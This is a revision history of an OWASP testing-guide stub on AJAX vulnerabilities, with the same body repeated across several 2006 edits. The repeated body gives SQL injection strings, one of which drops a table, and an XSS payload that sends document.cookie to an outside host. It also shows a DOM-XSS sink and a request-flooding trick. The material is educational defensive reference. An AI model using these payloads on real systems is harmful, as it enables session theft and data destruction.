*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T21:15:39Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T21:08:50Z

Anushshetty: /* References */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T21:06:27Z

Anushshetty: /* References */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==

;'''Whitepapers''' 
*[www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T20:50:16Z

Anushshetty: /* Introduction */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

